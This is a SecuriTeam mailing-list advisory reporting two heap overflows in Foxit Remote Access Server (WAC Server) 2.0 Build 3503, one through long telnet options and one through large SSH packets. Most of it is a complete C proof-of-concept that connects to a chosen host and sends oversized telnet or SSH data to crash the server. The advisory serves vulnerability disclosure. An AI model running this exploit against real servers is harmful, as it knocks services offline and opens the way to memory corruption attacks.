The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Foxit Remote Access Server Two Heap Overflows
------------------------------------------------------------------------
SUMMARY
<http://www.foxitsoft.com/wac/server_intro.php> WAC is "a commercial
SSH/telnet server for Windows". Two heap overflow vulnerabilities have
been discovered in Foxit Remote Access Server.
DETAILS
Vulnerable Systems:
* Foxit Remote Access Server (WAC Server) version 2.0 Build 3503
Telnet option heap overflow
The WAC server is vulnerable to a heap overflow exploitable through the
usage of options longer than 260 bytes.
Note: this bug was wrongly reported by me as a crash and with a wrong
server version one month ago.
SSH packet heap overflow
The server is affected also by another heap overflow exploitable through
big SSH packets, anyway no deeper research has been performed on this
vulnerability.
Exploit:
/*
by Luigi Auriemma - http://aluigi.org/poc/wachof.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
#define VER "0.1"
#define BUFFSZ 0xffff
#define BOF1SZ 600
#define BOF2SZ 60000
#define SSH2_MSG_DISCONNECT 1
#define SSH2_MSG_KEXINIT 20
int ssh_send(int sd, int type, u8 *buff, int len);
int str_recv(int sd, u8 *buff, int buffsz);
int tcp_recv(int sd, u8 *buff, int len);
int ssh_recv(int sd, u8 *buff);
int putsh(u8 *dst, u8 *str);
int putcc(u8 *data, int chr, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
attack;
u16 port;
u8 *buff,
*p;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"WAC Server <= 2.0 Build 3503 double heap overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port]\n"
"\n"
"Attack:\n"
" 1 = telnet option heap overflow (default port 23)\n"
" 2 = SSH packet heap overflow (default port 22)\n"
"\n", argv[0]);
exit(1);
}
attack = atoi(argv[1]);
switch(attack) {
case 1: port = 23; break;
case 2: port = 22; break;
default: {
printf("\nError: wrong attack number (%s)\n", argv[1]);
exit(1);
} break;
}
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr),
ntohs(peer.sin_port));
buff = malloc(BUFFSZ);
if(!buff) std_err();
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(attack == 1) {
if((timeout(sd, 3) < 0) || (recv(sd, buff, sizeof(buff), 0) <= 0))
goto quit;
printf("- send set option\n");
p = buff;
*p++ = 0xff; // telnet option
*p++ = 0xfa; // set option
*p++ = 0x00; // option
p += putcc(p, 'A', BOF1SZ);
*p++ = 0xff; // telnet option
*p++ = 0xf0; // set option
if(send(sd, buff, p - buff, 0) < 0) goto quit;
if((timeout(sd, 3) < 0) || (recv(sd, buff, sizeof(buff), 0) <= 0))
{
printf("- server should have been crashed\n");
}
} else if(attack == 2) {
if(str_recv(sd, buff, BUFFSZ) < 0) goto quit;
printf("- received banner: %s\n", buff);
#define SSHBANNER "SSH-2.0-OpenSSH_4.7p1\r\n"
if(send(sd, SSHBANNER, sizeof(SSHBANNER) - 1, 0) < 0) goto quit;
p = buff;
p += putxx(p, 0, 32); // reason
p += putxx(p, BOF2SZ, 32); // string size
p += putcc(p, 'A', BOF2SZ); // string
p += putsh(p, "");
if(ssh_send(sd, SSH2_MSG_DISCONNECT, buff, p - buff) < 0) goto
quit;
if(ssh_recv(sd, buff) < 0) goto quit;
}
quit:
close(sd);
free(buff);
printf("- done\n");
return(0);
}
int ssh_send(int sd, int type, u8 *buff, int len) {
int rem;
u8 tmp[16];
rem = (((len + 6) + 15) & (~15)) - (len + 6);
printf("- %d bytes sent (%d + %d)\n", 6 + len + rem, len, rem);
putxx(tmp, 1 + 1 + len + rem, 32);
tmp[4] = rem;
tmp[5] = type;
if(send(sd, tmp, 6, 0) != 6) return(-1);
if(len) {
if(send(sd, buff, len, 0) != len) return(-1);
}
if(rem) {
memset(tmp, 0, rem);
if(send(sd, tmp, rem, 0) != rem) return(-1);
}
return(0);
}
int str_recv(int sd, u8 *buff, int buffsz) {
int len,
t;
buffsz--;
for(len = 0; len < buffsz; len++) {
if(timeout(sd, 3) < 0) return(-1);
t = recv(sd, buff + len, 1, 0);
if(t <= 0) return(-1);
if(buff[len] == '\n') break;
if(buff[len] == '\r') buff[len] = 0;
}
buff[len] = 0;
return(0);
}
int tcp_recv(int sd, u8 *buff, int len) {
int t;
u8 *p;
for(p = buff; len; p += t, len -= t) {
if(timeout(sd, 3) < 0) return(-1);
t = recv(sd, p, len, 0);
if(t <= 0) return(-1);
}
return(0);
}
int ssh_recv(int sd, u8 *buff) {
u32 len;
u8 tmp[4];
if(tcp_recv(sd, tmp, 4) < 0) return(-1);
getxx(tmp, &len, 32);
if(len > BUFFSZ) return(0);
if(tcp_recv(sd, buff, len) < 0) return(-1);
printf("- %d bytes received\n", len);
return(len);
}
int putsh(u8 *dst, u8 *str) {
int len;
len = strlen(str);
putxx(dst, len, 32);
memcpy(dst + 4, str, len);
return(4 + len);
}
int putcc(u8 *data, int chr, int len) {
memset(data, chr, len);
return(len);
}
int getxx(u8 *data, u32 *ret, int bits) {
u32 num;
int i,
bytes;
bytes = bits >> 3;
for(num = i = 0; i < bytes; i++) {
num |= (data[i] << ((bytes - 1 - i) << 3));
}
*ret = num;
return(bytes);
}
int putxx(u8 *data, u32 num, int bits) {
int i,
bytes;
bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
}
return(bytes);
}
int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;
tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
if(select(sock + 1, &fd_read, NULL, NULL, &tout)
<= 0) return(-1);
return(0);
}
u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/wachof-adv.txt>
http://aluigi.altervista.org/adv/wachof-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
